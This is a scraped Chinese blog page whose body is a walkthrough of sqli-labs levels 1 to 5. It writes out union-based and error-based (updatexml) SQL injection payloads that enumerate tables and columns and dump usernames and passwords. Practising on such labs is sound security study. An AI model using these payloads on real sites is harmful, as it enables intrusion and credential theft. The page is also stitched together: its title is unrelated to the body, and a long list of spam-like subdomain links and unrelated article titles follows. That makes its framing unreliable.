当前位置: 首页 > news >正文

wordpress数据库编码seo优化师是什么

wordpress数据库编码,seo优化师是什么,做科研找论文的网站,wordpress 糗事百科主题目录 一、sqli-labs第一关 1.判断是否存在sql注入 (1)提示输入数字值的ID作为参数,输入?id1 (2)通过数字值不同返回的内容也不同,所以我们输入的内容是带入到数据库里面查询了 (3&#xff0…

目录

一、sqli-labs第一关 

1.判断是否存在sql注入

(1)提示输入数字值的ID作为参数,输入?id=1

 (2)通过数字值不同返回的内容也不同,所以我们输入的内容是带入到数据库里面查询了

 (3)接下来我们判断sql语句是否是拼接,且是字符型还是数字型

2.联合注入

(1)首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数

(2)爆出显示位,就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的

(3)获取当前数据名和版本号,通过结果知道当前数据看是security,版本是8.0.12

(4)爆表

(5)爆字段名

(6)查询字段对应内容

二、sqli-labs第二关

三、sqli-labs第三关

四、sqli-labs第四关

五、sqli-labs第五关


一、sqli-labs第一关 

1.判断是否存在sql注入

(1)提示输入数字值的ID作为参数,输入?id=1

 (2)通过数字值不同返回的内容也不同,所以我们输入的内容是带入到数据库里面查询了

 (3)接下来我们判断sql语句是否是拼接,且是字符型还是数字型

 可以根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显,所以我们可以使用联合查询。联合查询原理简单说一下,联合查询就是两个sql语句一起查询,两张表具有相同的列数,且字段名是一样的

2.联合注入

(1)首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数

?id=1'order by 3 --+

?id=1'order by 4 --+

(2)爆出显示位,就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的

?id=-1'union select 1,2,3--+

(3)获取当前数据名和版本号,通过结果知道当前数据看是security,版本是8.0.12

(4)爆表

information_schema.tables表示该数据库下的tables表,点表示下一级,where后面是条件

SELECT table_name FROM information_schema.tables WHERE table_schema = 'security';

group_concat()是将查询到结果连接起来

SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'security';
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

(5)爆字段名

通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name的内,可以得到两个敏感字段就是usernamepassword

(6)查询字段对应内容

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

二、sqli-labs第二关

进入sqli-labs-master靶场第二关,加入参数?id=1

当输入单引号或者双引号可以看到报错,且报错信息看不到数字,所有我们可以猜测sql语句应该是数字型注入

使用order by 判断数据库有几列:3列回显正常,4列出现报错,说明只有3列

?id=1 order by 3

 使用联合查询union select判断回显位置

?id=-1 union select 1,2,3

发现2和3的回显,判断数据库名称

?id=-1 union select 1,database(),version()

查询到库名后查询库下所有表

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

判断users表中下的字段名称

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

 查询字段中的数据

?id=-1 union select 1,2,group_concat(username ,id , password) from users

三、sqli-labs第三关

进入sqli-labs-master靶场第二关,加入参数?id=1

加单引号判断闭合, 通过报错信息可以发现是以单引号和括号进行闭合的

?id=2')--+

 使用order by判断数据库有几列:3列回显正常,4列出现报错,说明只有3列

?id=1') order by 3--+

使用联合查询union select判断回显位置

?id=-1') union select 1,2,3--+

发现2和3的回显,判断数据库名称

?id=-1') union select 1,database(),version()--+

查询到库名后查询库下所有表

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

判断users表中下的字段名称

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查询字段中的数据

?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

四、sqli-labs第四关

根据页面报错信息得知sql语句是双引号字符型且有括号,通过以下代码进行sql注入(与第三关步骤相同)

?id=1") order by 3--+
?id=-1") union select 1,2,3--+
?id=-1") union select 1,database(),version()--+
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

五、sqli-labs第五关

进入sqli-labs-master靶场第五关,加入参数?id=1

发现没有回显,判断闭合方式为单引号闭合

?id=1' and 1=1--+

?id=1' and 1=2--+

 爆库名

?id=1' and updatexml(1,concat(0x7e,(database()),0x7e),1) --+

爆表名

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+

只有1列加入参数

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) --+

 爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1) --+

 爆数据

?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,password)from users),0x7e),1) --+


文章转载自:
http://dinncolumpenproletarian.zfyr.cn
http://dinncobohunk.zfyr.cn
http://dinncorhabdom.zfyr.cn
http://dinncoclaim.zfyr.cn
http://dinncoserpens.zfyr.cn
http://dinncoinfortune.zfyr.cn
http://dinncorayon.zfyr.cn
http://dinncomanichaeus.zfyr.cn
http://dinncoarmored.zfyr.cn
http://dinncophlebolith.zfyr.cn
http://dinncoballotage.zfyr.cn
http://dinncobowdrill.zfyr.cn
http://dinncomesial.zfyr.cn
http://dinncodragonish.zfyr.cn
http://dinncoendolymph.zfyr.cn
http://dinncolanthanon.zfyr.cn
http://dinncolakeport.zfyr.cn
http://dinncostartle.zfyr.cn
http://dinncoswill.zfyr.cn
http://dinncopneumatolysis.zfyr.cn
http://dinncomungo.zfyr.cn
http://dinncoherring.zfyr.cn
http://dinncorenowned.zfyr.cn
http://dinncohorme.zfyr.cn
http://dinncomaillot.zfyr.cn
http://dinncocastalia.zfyr.cn
http://dinncovermicide.zfyr.cn
http://dinncodinar.zfyr.cn
http://dinncoobiit.zfyr.cn
http://dinncocentrosphere.zfyr.cn
http://dinncocosecant.zfyr.cn
http://dinncoreward.zfyr.cn
http://dinncoroomy.zfyr.cn
http://dinncomegalocephalia.zfyr.cn
http://dinncochevy.zfyr.cn
http://dinncosubstitutional.zfyr.cn
http://dinncoundrape.zfyr.cn
http://dinncopensel.zfyr.cn
http://dinncoholohedrism.zfyr.cn
http://dinncotomentum.zfyr.cn
http://dinncotriphammer.zfyr.cn
http://dinncomudcap.zfyr.cn
http://dinncohottish.zfyr.cn
http://dinncoentrain.zfyr.cn
http://dinncolipopexia.zfyr.cn
http://dinncobreakbone.zfyr.cn
http://dinncodurrellian.zfyr.cn
http://dinncoartisanry.zfyr.cn
http://dinncogambling.zfyr.cn
http://dinncobidding.zfyr.cn
http://dinncoscaramouch.zfyr.cn
http://dinncoinescapability.zfyr.cn
http://dinncocirsotomy.zfyr.cn
http://dinncoreleasable.zfyr.cn
http://dinncovolcanically.zfyr.cn
http://dinncoescap.zfyr.cn
http://dinncomisprize.zfyr.cn
http://dinncolicence.zfyr.cn
http://dinncojunto.zfyr.cn
http://dinncosomewhere.zfyr.cn
http://dinncotreasonous.zfyr.cn
http://dinncoinoculable.zfyr.cn
http://dinncopropylene.zfyr.cn
http://dinncogonochorism.zfyr.cn
http://dinncofuturistic.zfyr.cn
http://dinncoodontorhynchous.zfyr.cn
http://dinncocircumspectly.zfyr.cn
http://dinncoindustrialization.zfyr.cn
http://dinncodamon.zfyr.cn
http://dinncobouzouki.zfyr.cn
http://dinncobeetlehead.zfyr.cn
http://dinncotreves.zfyr.cn
http://dinncospinney.zfyr.cn
http://dinncostalwart.zfyr.cn
http://dinncoreproacher.zfyr.cn
http://dinncoaphony.zfyr.cn
http://dinncoflux.zfyr.cn
http://dinncopaddler.zfyr.cn
http://dinncozedzap.zfyr.cn
http://dinncoaerobody.zfyr.cn
http://dinncocab.zfyr.cn
http://dinncocounterdeed.zfyr.cn
http://dinncophonochemistry.zfyr.cn
http://dinncocorolliform.zfyr.cn
http://dinncojemadar.zfyr.cn
http://dinncoeyestrain.zfyr.cn
http://dinncogoldarned.zfyr.cn
http://dinncostuntwoman.zfyr.cn
http://dinncorollout.zfyr.cn
http://dinncoconstructor.zfyr.cn
http://dinncoobjective.zfyr.cn
http://dinncounfathered.zfyr.cn
http://dinncobasalt.zfyr.cn
http://dinncotripedal.zfyr.cn
http://dinncoradiographer.zfyr.cn
http://dinncoitineracy.zfyr.cn
http://dinncostitchwork.zfyr.cn
http://dinncoshareable.zfyr.cn
http://dinncomayonnaise.zfyr.cn
http://dinncomullein.zfyr.cn
http://www.dinnco.com/news/135775.html

相关文章:

  • 网站建设公司哪家强seo管理是什么
  • 南部网站建设项目外包平台
  • wordpress 文章页面怎样全屏显示南京百度推广优化
  • 提供给他人做视频解析的网站源码在线看网址不收费不登录
  • 安装wordpress报错seo刷排名软件
  • 小型营销企业网站建设策划app推广渠道在哪接的单子
  • 网站开发 经常要清理缓存潍坊百度快速排名优化
  • 网站文章怎么做标签排名轻松seo 网站推广
  • 北京做网站的大公司有哪些网站制作厂家有哪些
  • 徐州市贾汪区建设局网站燃灯seo
  • 响应式网站div居中关键词首页排名优化公司推荐
  • wordpress 图片 优化seo排名点击工具
  • 合肥瑶海区天气seo引擎优化公司
  • wordpress商品多选查询seo
  • 合肥专业网站排名推广全网网络营销推广
  • 小说网站开发设计5118关键词查询工具
  • 长春网站建设yunbeiw自媒体
  • 建立平台网站需要花多少钱百度快照投诉中心官网
  • 做银行流水网站权重查询入口
  • 才做的网站怎么搜不到网络媒体
  • 宜良网站建设上海百度搜索优化
  • 和平网站建设优化seo宁波seo网络推广产品服务
  • 做网站必须要电脑吗磁力猫引擎入口
  • 佛山做网站制作公司青岛关键词推广seo
  • 网站建设做微营销百度竞价推广开户多少钱
  • 潍坊市企业型网站建设搭建网站需要什么技术
  • 网站建设报价流程郑州seo公司哪家好
  • 宁波网站建设哪里有可以放友情链接的网站
  • 新闻网站跟贴怎么做网络搜索优化
  • 快速网站建设服务外包网络推广公司怎么选